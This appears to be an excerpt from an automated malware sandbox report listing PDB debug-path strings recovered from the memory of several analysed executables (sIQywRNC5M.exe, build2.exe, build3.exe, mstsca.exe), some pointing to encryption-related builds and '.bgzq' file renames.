Source:	Binary string: a\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\S-PC-20231004-1550.log.bgzqtings\Application Data\Application Data\Application Data\Applicatio source: sIQywRNC5M.exe, 00000005.00000002.2547866769.000000000322A000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490587835.000000000321C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499086680.0000000003229000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2505254692.000000000322A000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491776484.0000000003227000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497793013.0000000003224000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498455667.0000000003224000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\l source: sIQywRNC5M.exe, 00000005.00000003.2499050196.000000000319D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2512561008.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498904016.000000000317B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y\ source: sIQywRNC5M.exe, 00000005.00000003.2527809426.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2542393895.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2533728705.00000000035B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\";k source: sIQywRNC5M.exe, 00000005.00000003.2444743844.000000000316D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444634388.0000000003166000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2443480171.0000000003150000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\he\r source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\/ source: sIQywRNC5M.exe, 00000005.00000003.2193004950.0000000003232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\, source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*\a source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\5 source: sIQywRNC5M.exe, 00000005.00000003.2193004950.0000000003232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\Pack4 source: sIQywRNC5M.exe, 00000005.00000003.2444852723.0000000003294000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465758422.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444156089.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\# source: sIQywRNC5M.exe, 00000005.00000003.2490137312.000000000323F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\@ source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000002.2110659562.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.2108532152.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000009.00000000.2109798030.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: sIQywRNC5M.exe, 00000005.00000003.2334966830.0000000003232000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2193004950.0000000003232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\W$P source: sIQywRNC5M.exe, 00000005.00000003.2511312512.000000000366E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2504498896.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2511539947.00000000036E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*ory\\u source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\254\ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.000000000366E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2503888250.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\xinasu.pdb source: sIQywRNC5M.exe
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\p\M source: sIQywRNC5M.exe, 00000005.00000003.2505482464.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2506093082.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498067515.0000000003247000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497793013.0000000003224000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2500034757.0000000003257000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\\ source: sIQywRNC5M.exe, 00000005.00000003.2148161222.000000000313F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335172092.000000000313C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2148117977.000000000312B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2150305604.000000000312B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\352\:\U source: sIQywRNC5M.exe, 00000005.00000003.2518500164.0000000003644000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\bwe\ source: sIQywRNC5M.exe, 00000005.00000003.2518500164.0000000003644000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\tore\ source: sIQywRNC5M.exe, 00000005.00000003.2148161222.000000000313F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335172092.000000000313C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2148117977.000000000312B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2150305604.000000000312B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\c source: sIQywRNC5M.exe, 00000005.00000003.2408275863.0000000003213000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: sIQywRNC5M.exe, sIQywRNC5M.exe, 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\g source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Edge\*qU source: sIQywRNC5M.exe, 00000005.00000003.2490137312.000000000323F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errore\AppCache133584364071005184.txttxtw source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\m source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sIQywRNC5M.exe, 00000005.00000003.2123092523.0000000009A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\5 source: sIQywRNC5M.exe, 00000005.00000003.2515773524.0000000003336000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: sIQywRNC5M.exe, 00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000004.00000002.2052330651.0000000005D80000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2518287283.0000000003721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2432204625.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407447439.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433719950.00000000033EF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\=V source: sIQywRNC5M.exe, 00000005.00000003.2466724530.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490137312.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465758422.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2466477187.000000000329D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2492858422.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491259032.00000000032B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\o source: sIQywRNC5M.exe, 00000005.00000003.2466357017.000000000323F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444002451.0000000003231000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2466244705.000000000323B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465758422.0000000003211000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\^ source: sIQywRNC5M.exe, 00000005.00000003.2493869786.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491140733.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465915894.00000000033DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\** source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\** source: sIQywRNC5M.exe, 00000005.00000003.2433288502.000000000314F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433824342.0000000003177000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433171599.0000000003144000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432766191.0000000003134000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433329936.000000000316D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000002.2228877025.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000B.00000000.2132609845.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000D.00000000.2227791961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000010.00000000.2233339702.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000010.00000002.2309193789.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000011.00000000.2308477250.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000017.00000002.2728791100.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000017.00000000.2650842338.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001A.00000000.2727770543.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001B.00000000.3241957172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001B.00000002.3340913920.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000000.3340031319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000002.3965266280.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000000.3841712597.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000000.3962943920.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000000.4442019681.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000002.4493003377.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2490315317.0000000003683000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497603843.000000000362C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499800484.000000000365E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2505482464.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2506093082.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498067515.0000000003247000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498904016.000000000317B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499420917.0000000003182000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497793013.0000000003224000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2500034757.0000000003257000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: sIQywRNC5M.exe, 00000005.00000003.2335172092.000000000313C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbchCache\AppCache133584364071005184.txta source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: sIQywRNC5M.exe, 00000005.00000003.2335172092.000000000313C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\Q0v source: sIQywRNC5M.exe, 00000005.00000003.2504227018.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2503888250.0000000003584000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\{q* source: sIQywRNC5M.exe, 00000005.00000003.2490137312.000000000323F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2527809426.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2542393895.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2533728705.00000000035B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vGC:\xinasu.pdb source: sIQywRNC5M.exe
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2490315317.0000000003683000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497603843.000000000362C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499800484.000000000365E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ppli source: sIQywRNC5M.exe, 00000005.00000003.2510157688.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\bx\ source: sIQywRNC5M.exe, 00000005.00000003.2443737291.000000000359D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444886126.00000000035A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2443737291.000000000359D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465585747.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444886126.00000000035A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\972\ source: sIQywRNC5M.exe, 00000005.00000003.2518287283.0000000003721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: sIQywRNC5M.exe, 00000005.00000003.2433909081.0000000003234000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433225403.0000000003231000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp
